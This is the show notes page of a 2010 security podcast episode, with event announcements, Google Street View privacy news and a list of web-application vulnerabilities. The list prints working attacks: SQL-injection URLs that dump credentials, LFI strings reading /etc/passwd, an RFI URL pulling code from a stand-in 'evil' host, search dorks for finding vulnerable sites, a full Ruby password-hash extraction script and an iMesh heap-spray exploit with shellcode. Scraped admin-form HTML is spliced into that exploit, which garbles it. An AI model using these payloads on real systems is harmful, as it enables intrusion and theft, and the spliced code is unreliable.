Episode 116

InfoSec Daily Podcast Episode 116 [ 37:58 | 17.38 MB ] Play Now | Play in Popup | Download (282)

ISD Podcast Episode 116 for April 26, 2010. This podcast is our contribution back to the community where we will discuss the vulnerabilities of interest, information security related news hopefully providing you a few laughs and a little knowledge.

Announcements:
MyHardDriveDied.com:

• MHDD Data Recovery Class current dates and locations:
  • San Diego – May 10th-14th
  • San Francisco – June 14th -18th
  • Atlanta – July – 12th-16th
  • Chicago – September – 13th – 17th
  • Dallas, TX – October – 11th – 15th
  • Washington DC – December 6th – 10th
  • Cost is $3500 for all classes to reserve and register, call (678) 445-9007, email: smoulton@nicservices.com or go to http://www.myharddrivedied.com

SANS Community Atlanta:

• SANS Security 566: Implementing and Auditing the Twenty Critical Security Controls – In Depth May 17 – 21, 2010 (http://www.sans.org/atlanta-critical-controls-2010-cs)

SANS Mentoring Program:

• Jason Lawrence will also be putting on the SANS Mentor Forensics 508 – Computer Forensics and Investigations course in Sandy Springs starting Tuesday, June 22, 2010 – Tuesday, August 24, 2010 (http://www.sans.org/mentor/details.php?nid=21538)

Atlanta ISSA:

• Atlanta Secureworld Expo April 27 – 28, 2010  Cobb Galleria Centre (http://www.secureworldexpo.com/events/index.php?id=281)
• ISSA Chapter is hosting a CISSP Workshop starting May 26 – August 14 (Preparing for the August 15, 2010 Exam) 6:00 to 9:00 PM 2 sessions per week, every Wednesday and Friday at the Clendenin Building, Kennesaw State University.  The CISSP workshop is free of charge to Metro Atlanta ISSA members only. For further information, contact Ben Sholes, Director of Training, at: training@gaissa.org.
• ISSA International Conference – September 16, 2010  (http://www.issa.org/page/?p=105)

North Alabama ISSA:

• Hosting Second annual North Alabama Cyber Security Summit to be held on June 9th in Huntsville AL.  Event is open to ISSA members at a discounted price ($35 full price is $50).
• For more information please visit the North Alabama ISSA's web site at: http://northalabama.issa.org/

Kentuckiana ISSA:

• 6.5 hour Metasploit class on May 8th 2010 from 10am to 4:30pm (http://www.irongeek.com/i.php?page=security/louisville-metasploit-class)

Friends of the Podcast: Webhosting services:WebSpeedway

Vulnerabilities of Interest:

1. Mp3 Online Id Tag Editor is subject to a Remote File Inclusion (RFI) vulnerability.  Proof of Concept URLs are available: http://www.sample.com/mp3/velid3/module.archive.gzip.php?determined_format[include]=http://evil/exploit?
2. PhpMesFilms is subject to a SQL Injection vulnerability. Version 1.8 is impacted, though others may be as well.  Proof of Concept URLs are available: http://www.sample.com/phpmesfilms_1.8/index.php?id=3+union+select+1,2,3,4,concat(user(),0x3a,@@version),6,7,8,9,10–
3. Multi-Mirror is subject to a Remote Upload vulnerability. Proof of Concept is available: Step 1 – http://www.sample.com/Multi-Mirror/ (Select Mirrors 2 upload file and select file 2 upload) Step 2 – http://www.sample.com/Multi-Mirror/temp_files (After Upload )
4. Mihalism Multi Host is subject to a Upload vulnerability. Version 4.0.0 is impacted, though others may be as well.  Google Dork "inurl: Mihalis"  Proof of Concept is available: Step 1 – http://www.sample.com/Mihalis/index.php (Use Tamper Data) Step 2 – http://www.sample.com/Mihalis/images/02j3gul0lkay3ggoz5ci.php (File Name)
5. Magic Uploader Mini is subject to a Upload vulnerability. Google Dork "inurl: miniuploader"  Proof of Concept is available: Step 1 – http://www.sample.com/miniuploader/index.php (Use Tamper Data) Step 2 – http://www.sample.com/miniuploader/uploads/ (File Name)
6. Almnzm is subject to a SQL Injection vulnerability. Version older than 2.1 are impacted, though others may be as well.  Example URL is available: http://www.sample.com/index.php?a=pages&id=3' and 1=0 UnIon aLL Select 1,2,concat(username,0x3a,password),4,5,6,7 from almnzm_customers–%20
7. Bild Flirt is subject to a SQL Injection vulnerability. Version older than 1.0 are impacted, though others may be as well.  Exploit code is available: #!/usr/bin/ruby #4004-security-project.com #Discovered and vulnerability by Easy Laster print " ######################################################### #                   4004-Security-Project               # ######################################################### #        Bild Flirt <= version 1.0 SQL Injection        # #                          Exploit                      # #                  Using Host+Path+userid               # #                 www.demo.de /bildflirt/ 1             # #                         Easy Laster                   # ######################################################### " require 'net/http' print "#########################################################" print "\nEnter host name (site.com)->" host=gets.chomp print "#########################################################" print "\nEnter script path (/forum/)->" path=gets.chomp print "#########################################################" print "\nEnter script path (userid)->" userid=gets.chomp print "#########################################################" begin dir = "index.php?id=999999999+and+1=0+union+select+concat(0×23,0×23,0×23,0×23,0×23,name,0×23,0×23,0×23,0×23,0×23)+from+bildf_user+where+user_id="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nThe Username is  -> "+(/#####(.+)#####/).match(resp.body)[1] dir = "index.php?id=999999999+and+1=0+union+select+concat(0×23,0×23,0×23,0×23,0×23,passwort,0×23,0×23,0×23,0×23,0×23)+from+bildf_user+where+user_id="+ userid +"–" http = Net::HTTP.new(host, 80) resp= http.get(path+dir) print "\nMD5 Password Hash is -> "+(/#####(.+)#####/).match(resp.body)[1] print "\n#########################################################" rescue print "\nExploit failed" end
8. YUI Images Script is subject to a Shell Upload vulnerability. Version 1.0 is impacted, though others may be as well. Google Dork "inurl: YUI-upload".  Example URLs are available: http://www.sample.com/YUI-upload/html (Upload shell .php.giff) http://www.sample.com/YUI-upload/html/files/ (Your Shell.php.giff)
9. Opentel Openmairie tel is subject to a Local File Inclusion (LFI) vulnerability. Version 1.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab".  Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
10. Openstock Facture is subject to a Local File Inclusion (LFI) vulnerability. Version 2.02 is impacted, though others may be as well. Google Dork "inurl: scr/soustab".  Example URL is available: http://www.sample.com/scr/soustab.php?dsn[phptype]=../../../../../../../../etc/passwd%00
11. iMesh is subject to a Buffer Overflow vulnerability. Versions older than 7.1.0.x are impacted, though others may be as well. Exploit code is available: <html> <object classid='clsid:7C3B01BC-53A5-48A0-A43B-0C67731134B9' id='IMWebControl' /></object> <SCRIPT> //add su one, user: sun pass: tzu shellcode = unescape("%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c%u5078%u3344%u6530%u7550%u4e50%u716b%u6555%u6c6c%u614b%u676c%u3175%u6568%u5a51%u4e4f%u306b%u564f%u4c78%u414b%u774f%u4450%u4841%u576b%u4c39%u664b%u4c54%u444b%u7841%u466e%u6951%u4f50%u6c69%u6b6c%u6f34%u3330%u6344%u6f37%u6a31%u646a%u474d%u4871%u7842%u4c6b%u6534%u716b%u5144%u6334%u7434%u5835%u6e65%u736b%u646f%u7364%u5831%u756b%u4c36%u644b%u624c%u6c6b%u634b%u656f%u574c%u7871%u4c6b%u774b%u4c6c%u464b%u7861%u4f6b%u7379%u516c%u3334%u6b34%u7073%u4931%u7550%u4e34%u536b%u3470%u4b70%u4f35%u7030%u4478%u4c4c%u414b%u5450%u4c4c%u624b%u6550%u6c4c%u6e6d%u626b%u6548%u6858%u336b%u6c39%u4f4b%u4e70%u5350%u3530%u4350%u6c30%u704b%u3568%u636c%u366f%u4b51%u5146%u7170%u4d46%u5a59%u6c58%u5943%u6350%u364b%u4230%u7848%u686f%u694e%u3170%u3370%u4d58%u6b48%u6e4e%u346a%u464e%u3937%u396f%u7377%u7053%u 426d%u6444%u756e%u5235%u3058%u6165%u4630%u654f%u3133%u7030%u706e%u3265%u7554%u7170%u7265%u5353%u7055%u5172%u5030%u4273%u3055%u616e%u4330%u7244%u515a%u5165%u5430%u526f%u5161%u3354%u3574%u7170%u5736%u4756%u7050%u306e%u7465%u4134%u7030%u706c%u316f%u7273%u6241%u614c%u4377%u6242%u524f%u3055%u6770%u3350%u7071%u3064%u516d%u4279%u324e%u7049%u5373%u5244%u4152%u3371%u3044%u536f%u4242%u6153%u5230%u4453%u5035%u756e%u3470%u506f%u6741%u7734%u4734%u4570"); bigblock  = unescape("%u9090%u9090"); headersize = 20; slackspace = headersize+shellcode.length; while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0×40000) block = block+block+fillblock; memory = new Array(); for (i=0;i<77;i++){memory[i] = block+shellcode} bigblock  = unescape("%u0707%u0707"); while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0×40000) block = block+block+fillblock; for (i=77;i<144;i++){memory[i] = block+shellcode} bigblock  = unescape("%u0909%u0909"); while (bigblock.length<slackspace) bigblock+=bigblock; fillblock = bigblock.substring(0, slackspace); block = bigblock.substring(0, bigblock.length-slackspace); while(block.length+slackspace<0×40000) block = block+block+fillblock; for (i=144;i<500;i++){memory[i] = block+shellcode} </script> <script language='vbscript'> puf=218959117 'set ecx to 0x0d0d0d0d IMWebControl.SetHandler puf puf="" IMWebControl.ProcessRequestEx puf </script> </html> # milw0rm.com [2007-12-18] </textarea><br> Text File Extension:<br><input size=5 value="html"> <i>used at downloading</i><br><br> </span> <span id='pdf' style='display: none'> Attached File Name:<br><input name='filename' size=20 value=''> <i>file from 'papers' dir</i><br><br> </span> Application File Name:<br><input type="text" size=25 value="iMeshV7.exe"><br> MD5 of Application File:<br><input size=25 name="md5" value="0e0681816776e98c78432fcb4cd6f1cf"><br><br> <!–CVE:<br><input size=25 value=""><br><br>–> Verified: <input type="checkbox" value=1 checked ><br><br> <input type='submit' value="Save"> </form> <br> <h3>Codes of this record</h3> <table border=1> <tr><td>#<td>ID<td>OSVDB<td>CVE<td> <td> </tr> </table> <a href='?action=code_edit&mw_id=9477&back=9477&page=0&id_filter=9477&desc_filter=&platform_filter=&type_filter=&port_filter=&author_filter=&duplicates_filter=&verified_filter=&osvdb_filter=&cve_filter='>Add codes</a> <br>

Stories of Interest:
News item 1:  http://www.theregister.co.uk/2010/04/22/google_streetview_logs_wlans/
Google's roving Street View spycam may blur your face, but it's got your number. The Street View service is under fire in Germany for scanning private WLAN networks, and recording users' unique Mac (Media Access Control) addresses, as the car trundles along. Germany's Federal Commissioner for Data Protection Peter Schaar says he's "horrified" by the discovery. "I am appalled… I call upon Google to delete previously unlawfully collected personal data on the wireless network immediately and stop the rides for Street View," according to German broadcaster ARD. Spooks have long desired the ability to cross reference the Mac address of a user's connection with their real identity and virtual identity, such as their Gmail or Facebook account. Other companies have logged broadcasting WLAN networks and published the information. By contrast Google has not published the WLAN map, or Street View in Germany; Google hopes to launch the service by the end of the year. At least since 2008 is publicly known that record companies like Skyhook equip test vehicles with Wi-Fi. The company offers its radio signals and mobile phone data for years with software developers.  The company has mapped 80 million worldwide according to their own data Wi-Fi locations.  To that point, the first iPhone used the Skyhook technology to determine the approximate location of the phone using a number of wireless signals. The major difference here is that Skyhook technology is not made public.

News item 2:http://www.guardian.co.uk/technology/2010/apr/20/google-google-street-view
Google has hit out at state attempts to clamp down on the internet by revealing governments' requests to remove data from the web and get information about users. Tonight it released a web page with a map showing country by country where it has had government requests or court orders to remove content from the YouTube video service or its search results, or to provide details about users of its services. The release of the tool, announced on its official blog, comes as it has had to counter complaints from data protection authorities in 10 countries, including the UK, that its Street View product, which provides pictures of public streets, and its ad-hoc social networking service Buzz "were launched without due consideration of privacy and data protection laws" and that Buzz in particular "betrayed a disappointing disregard for fundamental privacy norms". Details provided by Google cover requests between 1 July and 31 December 2009, and show that in the UK there were 1,166 requests for data about users and 59 requests to remove web pages in Google's services such as YouTube, or from its search results for the web. It complied with 45, or 76%, of the 59 requests, of which 43 were about YouTube videos. It does not specify which government agency – such as the police or others – made the request.